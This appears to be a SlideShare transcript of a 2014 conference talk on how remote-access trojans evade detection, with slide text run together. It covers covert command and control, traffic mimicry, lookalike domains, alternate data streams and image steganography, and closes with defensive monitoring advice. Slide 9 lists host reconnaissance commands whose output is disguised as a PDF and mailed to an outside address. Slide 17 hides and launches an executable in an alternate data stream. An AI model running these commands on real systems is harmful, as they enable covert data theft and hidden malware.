CodeStock14: Hiding in Plain Sight

4,186 views

Published on

Presentation from

Published in: Technology, Design
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
4,186
On SlideShare
0
From Embeds
0
Number of Embeds
2,067
Actions
Shares
0
Downloads
7
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

CodeStock14: Hiding in Plain Sight

  1. 1. HidinginPlainSight Presentedby /RobGillen @argodev Thisworkislicensedundera . Thistalkandrelatedresourcesareavailableonline: CreativeCommonsAttribution4.0InternationalLicense https://github.com/argodev/talks/
  2. 2. Disclaimer Thecontentofthispresentationrepresentsmypersonalviews andthoughtsatthepresenttime.Ireservetherighttochange myviewsandopinionsatanytime.Thiscontentisnotendorsed by,orrepresentativeinanywayofmyemployernorisit intendedtobeaviewintomyworkorareflectiononthetype ofworkthatIormygroupperforms.Itissimplyahobbyand personalinterestandshouldbeconsideredassuch.
  3. 3. HTDCS HelpdeskTicketDrivenCyberSecurity
  4. 4. Overview RATDesign Encryption Command/Control(C2) AntiVirus Behavior
  5. 5. RATDesign Exeisdroppedviainfectedpage Querieswebpageforcommands Performscommandsifnotdonepreviously Periodicallypollsfornewcommands
  6. 6. Encryption ComplexEncryptionistrivial PBKDF–Scryptsequentialmemory-hardfunction Manyiterations(>10K) Longkey-lengths
  7. 7. EncryptionExample Aboveconfigurationiscustom-hardwareresistant Takesapproximately¼secondperguess
  8. 8. Command/Control UseWeb2CApproach Commandsare“issued”enmassevianormal,benignlooking webpages Commonports LeveragesexistingHTML/serverconstructs
  9. 9. CommandText ipconfig /all > %APPDATA%info.txt net start >> %APPDATA%info.txt tasklist /v >> %APPDATA%info.txt net user >> %APPDATA%info.txt net localgroup administrators >> %APPDATA%info.txt netstat -ano >> %APPDATA%info.txt net use >> %APPDATA%info.txt copy %APPDATA%info.txt %APPDATA%output.pdf del %APPDATA%info.txt sendmail %APPDATA%output.pdf Status Update “Jones, William E. wejones@yourorg.gov” itebaffe-836@yopmail.com smtp.yourorg.gov del %APPDATA%output.pdf
  10. 10. MimicUserBehavior TrafficRates Monitorincoming/outgoingnetworktrafficforXdays ConfigurexfiltostaywithinX%of“normal” C2 Exponential/randomizedstand-down Onlycommduringperiodsofactivity
  11. 11. MimicUserBehavior TargetURLs Monitoroutgoingwebqueries/URLsforXdays Usesimilardomainnamesformalicioustraffic Appendsimilar/samequerystringstomaliciousrequests
  12. 12. HidinginLogs v-client-5b.sjc.dropbox.com snt-re3-9a.sjc.dropbox.com yn-in-f125.1e100.net l1.ycs.vip.dcb.yahoo.com snt-re3-9a.sjc.drpbox.com ip-69-31-29-228.nlayer.net a23-47-20-211.deploy.static.akamaitechnologies.com l3.ycs.vip.dcb.yahoo.com ir2.fp.vip.bf1.yahoo.com www.nbcnews.com.edgesuite.net wac.946A.edgecastcdn.net a2.twimg.com
  13. 13. OtherHidingTechniques OfficeFilecontentembedding Creativelocation AlternateDataStreams LeastSignificantBit NetworkProtocolManipulation
  14. 14. CreativeFileLocations
  15. 15. AlternateDataStreams FeatureofNTFSsinceNT3.5.1 Usedformetadataandcompatibilitywithotherfilesystems
  16. 16. SoWhat? #notepad pcast-nitrd-report-2010.pdf:secret.txt
  17. 17. Whataboutthis? #type evil.exe > notepad.exe:evil.exe #start notepad.exe:evil.exe
  18. 18. CrudeImageStego:LSB LeastSignificantBit–alteritandencodemessageacross LSBthroughvariousbytes Visuallyimperceptible Computationallychallengingtodetect Encryptionalsoanoption
  19. 19. LSB:HowItWorks
  20. 20. CarrierImage ImageData: Size:2.1MB Dimensions: 3500x2343px Resolution:300dpi BitDepth:24 ~8Megapixel “Secret”Message: Welcome!Remember, thingsaren’talways whattheyseem.
  21. 21. LSBBlowUp
  22. 22. NetworkProtocolAbuse
  23. 23. Challengesof Signature-BasedTools
  24. 24. NextSteps Knowwhatyoucanandcan’tsee Considerimplicationsofyourmonitoringstrategy Behavior*must*playarole
  25. 25. Questions/Contact RobGillen rob@gillenfamily.net http://rob.gillenfamily.net @argodev Thistalkandrelatedresourcesareavailableonline: https://github.com/argodev/talks/

×